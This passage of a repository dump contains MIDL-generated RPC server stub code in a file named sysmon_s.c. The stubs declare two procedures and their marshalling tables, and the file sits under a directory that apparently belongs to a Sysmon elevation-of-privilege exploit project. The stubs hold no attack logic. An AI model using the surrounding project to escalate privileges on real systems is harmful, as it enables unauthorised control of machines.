arg_0,\r\n    /* [string][in] */ wchar_t *arg_1);\r\n\r\n\r\n\r\nextern RPC_IF_HANDLE DefaultIfName_v1_0_c_ifspec;\r\nextern RPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec;\r\n#endif /* __DefaultIfName_INTERFACE_DEFINED__ */\r\n\r\n/* Additional Prototypes for ALL interfaces */\r\n\r\n/* end of Additional Prototypes */\r\n\r\n#ifdef __cplusplus\r\n}\r\n#endif\r\n\r\n#endif\r\n\r\n\r\n"
  },
  {
    "path": "v2/SysmonEoP/sysmon_s.c",
    "content": "\r\n\r\n/* this ALWAYS GENERATED file contains the RPC server stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n#if _MSC_VER >= 1200\r\n#pragma warning(push)\r\n#endif\r\n\r\n#pragma warning( disable: 4211 )  /* redefine extern to static */\r\n#pragma warning( disable: 4232 )  /* dllimport identity*/\r\n#pragma warning( disable: 4024 )  /* array to pointer mapping*/\r\n\r\n#include <string.h>\r\n#include \"sysmon_h.h\"\r\n\r\n#define TYPE_FORMAT_STRING_SIZE   7                                 \r\n#define PROC_FORMAT_STRING_SIZE   79                                \r\n#define EXPR_FORMAT_STRING_SIZE   1                                 \r\n#define TRANSMIT_AS_TABLE_SIZE    0            \r\n#define WIRE_MARSHAL_TABLE_SIZE   0            \r\n\r\ntypedef struct _sysmon_MIDL_TYPE_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ TYPE_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_TYPE_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_PROC_FORMAT_STRING\r\n    {\r\n    short          Pad;\r\n    unsigned char  Format[ PROC_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_PROC_FORMAT_STRING;\r\n\r\ntypedef struct _sysmon_MIDL_EXPR_FORMAT_STRING\r\n    {\r\n    long          Pad;\r\n    unsigned char  Format[ EXPR_FORMAT_STRING_SIZE ];\r\n    } sysmon_MIDL_EXPR_FORMAT_STRING;\r\n\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _RpcTransferSyntax = 
\r\n{{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}};\r\n\r\nstatic const RPC_SYNTAX_IDENTIFIER  _NDR64_RpcTransferSyntax = \r\n{{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}};\r\n\r\n\r\nextern const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString;\r\nextern const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString;\r\nextern const sysmon_MIDL_EXPR_FORMAT_STRING sysmon__MIDL_ExprFormatString;\r\n\r\n/* Standard interface: DefaultIfName, ver. 1.0,\r\n   GUID={0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}} */\r\n\r\n\r\nextern const MIDL_SERVER_INFO DefaultIfName_ServerInfo;\r\n\r\nextern const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable;\r\n\r\nstatic const RPC_SERVER_INTERFACE DefaultIfName___RpcServerInterface =\r\n    {\r\n    sizeof(RPC_SERVER_INTERFACE),\r\n    {{0x1e72d56f,0xeec6,0x44d3,{0xbb,0xed,0x5c,0xaa,0x50,0x79,0x08,0x12}},{1,0}},\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,\r\n    0,\r\n    0,\r\n    0,\r\n    &DefaultIfName_ServerInfo,\r\n    0x06000000\r\n    };\r\nRPC_IF_HANDLE DefaultIfName_v1_0_s_ifspec = (RPC_IF_HANDLE)& DefaultIfName___RpcServerInterface;\r\n\r\nextern const MIDL_STUB_DESC DefaultIfName_StubDesc;\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\nstatic const sysmon_MIDL_PROC_FORMAT_STRING sysmon__MIDL_ProcFormatString =\r\n    {\r\n        0,\r\n        {\r\n\r\n\t/* Procedure Proc0 */\r\n\r\n\t\t\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/*  2 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/*  6 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  8 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 10 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 12 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 14 */\tNdrFcShort( 0x0 ),\t/* 0 
*/\r\n/* 16 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 18 */\t0x44,\t\t/* Oi2 Flags:  has return, has ext, */\r\n\t\t\t0x1,\t\t/* 1 */\r\n/* 20 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 22 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 24 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 26 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 28 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Return value */\r\n\r\n/* 30 */\tNdrFcShort( 0x70 ),\t/* Flags:  out, return, base type, */\r\n/* 32 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 34 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Procedure Proc1 */\r\n\r\n/* 36 */\t0x0,\t\t/* 0 */\r\n\t\t\t0x48,\t\t/* Old Flags:  */\r\n/* 38 */\tNdrFcLong( 0x0 ),\t/* 0 */\r\n/* 42 */\tNdrFcShort( 0x1 ),\t/* 1 */\r\n/* 44 */\tNdrFcShort( 0x18 ),\t/* X64 Stack size/offset = 24 */\r\n/* 46 */\t0x32,\t\t/* FC_BIND_PRIMITIVE */\r\n\t\t\t0x0,\t\t/* 0 */\r\n/* 48 */\tNdrFcShort( 0x0 ),\t/* X64 Stack size/offset = 0 */\r\n/* 50 */\tNdrFcShort( 0x8 ),\t/* 8 */\r\n/* 52 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 54 */\t0x42,\t\t/* Oi2 Flags:  clt must size, has ext, */\r\n\t\t\t0x2,\t\t/* 2 */\r\n/* 56 */\t0xa,\t\t/* 10 */\r\n\t\t\t0x1,\t\t/* Ext Flags:  new corr desc, */\r\n/* 58 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 60 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 62 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/* 64 */\tNdrFcShort( 0x0 ),\t/* 0 */\r\n\r\n\t/* Parameter arg_0 */\r\n\r\n/* 66 */\tNdrFcShort( 0x48 ),\t/* Flags:  in, base type, */\r\n/* 68 */\tNdrFcShort( 0x8 ),\t/* X64 Stack size/offset = 8 */\r\n/* 70 */\t0x8,\t\t/* FC_LONG */\r\n\t\t\t0x0,\t\t/* 0 */\r\n\r\n\t/* Parameter arg_1 */\r\n\r\n/* 72 */\tNdrFcShort( 0x10b ),\t/* Flags:  must size, must free, in, simple ref, */\r\n/* 74 */\tNdrFcShort( 0x10 ),\t/* X64 Stack size/offset = 16 */\r\n/* 76 */\tNdrFcShort( 0x4 ),\t/* Type Offset=4 */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const sysmon_MIDL_TYPE_FORMAT_STRING sysmon__MIDL_TypeFormatString =\r\n    
{\r\n        0,\r\n        {\r\n\t\t\tNdrFcShort( 0x0 ),\t/* 0 */\r\n/*  2 */\t\r\n\t\t\t0x11, 0x8,\t/* FC_RP [simple_pointer] */\r\n/*  4 */\t\r\n\t\t\t0x25,\t\t/* FC_C_WSTRING */\r\n\t\t\t0x5c,\t\t/* FC_PAD */\r\n\r\n\t\t\t0x0\r\n        }\r\n    };\r\n\r\nstatic const unsigned short DefaultIfName_FormatStringOffsetTable[] =\r\n    {\r\n    0,\r\n    36\r\n    };\r\n\r\n\r\nstatic const RPC_DISPATCH_FUNCTION DefaultIfName_table[] =\r\n    {\r\n    NdrServerCall2,\r\n    NdrServerCall2,\r\n    0\r\n    };\r\nstatic const RPC_DISPATCH_TABLE DefaultIfName_v1_0_DispatchTable = \r\n    {\r\n    2,\r\n    (RPC_DISPATCH_FUNCTION*)DefaultIfName_table\r\n    };\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n\r\n\r\n/* this ALWAYS GENERATED file contains the RPC server stubs */\r\n\r\n\r\n /* File created by MIDL compiler version 8.01.0622 */\r\n/* at Mon Jan 18 19:14:07 2038\r\n */\r\n/* Compiler settings for sysmon.idl:\r\n    Oicf, W1, Zp8, env=Win64 (32b run), target_arch=AMD64 8.01.0622 \r\n    protocol : all , ms_ext, c_ext, robust\r\n    error checks: allocation ref bounds_check enum stub_data \r\n    VC __declspec() decoration level: \r\n         __declspec(uuid()), __declspec(selectany), __declspec(novtable)\r\n         DECLSPEC_UUID(), MIDL_INTERFACE()\r\n*/\r\n/* @@MIDL_FILE_HEADING(  ) */\r\n\r\n#if defined(_M_AMD64)\r\n\r\n\r\n\r\n\r\n#if !defined(__RPC_WIN64__)\r\n#error  Invalid build platform for this stub.\r\n#endif\r\n\r\n\r\n#include \"ndr64types.h\"\r\n#include \"pshpack8.h\"\r\n\r\n\r\ntypedef \r\nstruct _NDR64_CONFORMANT_STRING_FORMAT\r\n__midl_frag7_t;\r\nextern const __midl_frag7_t __midl_frag7;\r\n\r\ntypedef \r\nstruct _NDR64_POINTER_FORMAT\r\n__midl_frag6_t;\r\nextern const __midl_frag6_t __midl_frag6;\r\n\r\ntypedef \r\nNDR64_FORMAT_CHAR\r\n__midl_frag5_t;\r\nextern const __midl_frag5_t __midl_frag5;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct 
_NDR64_PARAM_FORMAT frag3;\r\n    struct _NDR64_PARAM_FORMAT frag4;\r\n}\r\n__midl_frag4_t;\r\nextern const __midl_frag4_t __midl_frag4;\r\n\r\ntypedef \r\nstruct \r\n{\r\n    struct _NDR64_PROC_FORMAT frag1;\r\n    struct _NDR64_BIND_AND_NOTIFY_EXTENSION frag2;\r\n    struct _NDR64_PARAM_FORMAT frag3;\r\n}\r\n__midl_frag2_t;\r\nextern const __midl_frag2_t __midl_frag2;\r\n\r\ntypedef \r\nNDR64_FORMAT_UINT32\r\n__midl_frag1_t;\r\nextern const __midl_frag1_t __midl_frag1;\r\n\r\nstatic const __midl_frag7_t __midl_frag7 =\r\n{ \r\n/* *wchar_t */\r\n    { \r\n    /* *wchar_t */\r\n        0x64,    /* FC64_CONF_WCHAR_STRING */\r\n        { \r\n        /* *wchar_t */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0\r\n        },\r\n        (NDR64_UINT16) 2 /* 0x2 */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag6_t __midl_frag6 =\r\n{ \r\n/* *wchar_t */\r\n    0x20,    /* FC64_RP */\r\n    (NDR64_UINT8) 0 /* 0x0 */,\r\n    (NDR64_UINT16) 0 /* 0x0 */,\r\n    &__midl_frag7\r\n};\r\n\r\nstatic const __midl_frag5_t __midl_frag5 =\r\n0x5    /* FC64_INT32 */;\r\n\r\nstatic const __midl_frag4_t __midl_frag4 =\r\n{ \r\n/* Proc1 */\r\n    { \r\n    /* Proc1 */      /* procedure Proc1 */\r\n        (NDR64_UINT32) 17039424 /* 0x1040040 */,    /* explicit handle */ /* IsIntrepreted, ClientMustSize, HasExtensions */\r\n        (NDR64_UINT32) 24 /* 0x18 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 2 /* 0x2 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    /* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n     
       (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* arg_0 */      /* parameter arg_0 */\r\n        &__midl_frag5,\r\n        { \r\n        /* arg_0 */\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [in], Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    },\r\n    { \r\n    /* arg_1 */      /* parameter arg_1 */\r\n        &__midl_frag7,\r\n        { \r\n        /* arg_1 */\r\n            1,\r\n            1,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* MustSize, MustFree, [in], SimpleRef */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        16 /* 0x10 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag2_t __midl_frag2 =\r\n{ \r\n/* Proc0 */\r\n    { \r\n    /* Proc0 */      /* procedure Proc0 */\r\n        (NDR64_UINT32) 17301568 /* 0x1080040 */,    /* explicit handle */ /* IsIntrepreted, HasReturn, HasExtensions */\r\n        (NDR64_UINT32) 16 /* 0x10 */ ,  /* Stack size */\r\n        (NDR64_UINT32) 0 /* 0x0 */,\r\n        (NDR64_UINT32) 8 /* 0x8 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        (NDR64_UINT16) 1 /* 0x1 */,\r\n        (NDR64_UINT16) 8 /* 0x8 */\r\n    },\r\n    { \r\n    /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n        { \r\n        /* struct _NDR64_BIND_AND_NOTIFY_EXTENSION */\r\n            0x72,    
/* FC64_BIND_PRIMITIVE */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            0 /* 0x0 */,   /* Stack offset */\r\n            (NDR64_UINT8) 0 /* 0x0 */,\r\n            (NDR64_UINT8) 0 /* 0x0 */\r\n        },\r\n        (NDR64_UINT16) 0 /* 0x0 */      /* Notify index */\r\n    },\r\n    { \r\n    /* long */      /* parameter long */\r\n        &__midl_frag5,\r\n        { \r\n        /* long */\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            1,\r\n            1,\r\n            1,\r\n            1,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            0,\r\n            (NDR64_UINT16) 0 /* 0x0 */,\r\n            0\r\n        },    /* [out], IsReturn, Basetype, ByValue */\r\n        (NDR64_UINT16) 0 /* 0x0 */,\r\n        8 /* 0x8 */,   /* Stack offset */\r\n    }\r\n};\r\n\r\nstatic const __midl_frag1_t __midl_frag1 =\r\n(NDR64_UINT32) 0 /* 0x0 */;\r\n\r\n\r\n#include \"poppack.h\"\r\n\r\n\r\nstatic const FormatInfoRef DefaultIfName_Ndr64ProcTable[] =\r\n    {\r\n    &__midl_frag2,\r\n    &__midl_frag4\r\n    };\r\n\r\n\r\nstatic const MIDL_STUB_DESC DefaultIfName_StubDesc = \r\n    {\r\n    (void *)& DefaultIfName___RpcServerInterface,\r\n    MIDL_user_allocate,\r\n    MIDL_user_free,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    0,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    1, /* -error bounds_check flag */\r\n    0x60001, /* Ndr library version */\r\n    0,\r\n    0x801026e, /* MIDL Version 8.1.622 */\r\n    0,\r\n    0,\r\n    0,  /* notify & notify_flag routine table */\r\n    0x2000001, /* MIDL flag */\r\n    0, /* cs routines */\r\n    (void *)& DefaultIfName_ServerInfo,   /* proxy/server info */\r\n    0\r\n    };\r\n\r\nstatic const RPC_DISPATCH_FUNCTION DefaultIfName_NDR64__table[] =\r\n    {\r\n    NdrServerCallAll,\r\n    NdrServerCallAll,\r\n    0\r\n    };\r\nstatic const RPC_DISPATCH_TABLE DefaultIfName_NDR64__v1_0_DispatchTable = \r\n    {\r\n    2,\r\n    
(RPC_DISPATCH_FUNCTION*)DefaultIfName_NDR64__table\r\n    };\r\n\r\nstatic const MIDL_SYNTAX_INFO DefaultIfName_SyntaxInfo [  2 ] = \r\n    {\r\n    {\r\n    {{0x8A885D04,0x1CEB,0x11C9,{0x9F,0xE8,0x08,0x00,0x2B,0x10,0x48,0x60}},{2,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_v1_0_DispatchTable,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    DefaultIfName_FormatStringOffsetTable,\r\n    sysmon__MIDL_TypeFormatString.Format,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    ,{\r\n    {{0x71710533,0xbeba,0x4937,{0x83,0x19,0xb5,0xdb,0xef,0x9c,0xcc,0x36}},{1,0}},\r\n    (RPC_DISPATCH_TABLE*)&DefaultIfName_NDR64__v1_0_DispatchTable,\r\n    0 ,\r\n    (unsigned short *) DefaultIfName_Ndr64ProcTable,\r\n    0,\r\n    0,\r\n    0,\r\n    0\r\n    }\r\n    };\r\n\r\n\r\nstatic const SERVER_ROUTINE DefaultIfName_ServerRoutineTable[] = \r\n    {\r\n    (SERVER_ROUTINE)Proc0,\r\n    (SERVER_ROUTINE)Proc1\r\n    };\r\n\r\nstatic const MIDL_SERVER_INFO DefaultIfName_ServerInfo = \r\n    {\r\n    &DefaultIfName_StubDesc,\r\n    DefaultIfName_ServerRoutineTable,\r\n    sysmon__MIDL_ProcFormatString.Format,\r\n    (unsigned short *) DefaultIfName_FormatStringOffsetTable,\r\n    0,\r\n    (RPC_SYNTAX_IDENTIFIER*)&_NDR64_RpcTransferSyntax,\r\n    2,\r\n    (MIDL_SYNTAX_INFO*)DefaultIfName_SyntaxInfo\r\n    };\r\n#if _MSC_VER >= 1200\r\n#pragma warning(pop)\r\n#endif\r\n\r\n\r\n#endif /* defined(_M_AMD64)*/\r\n\r\n"
  }
]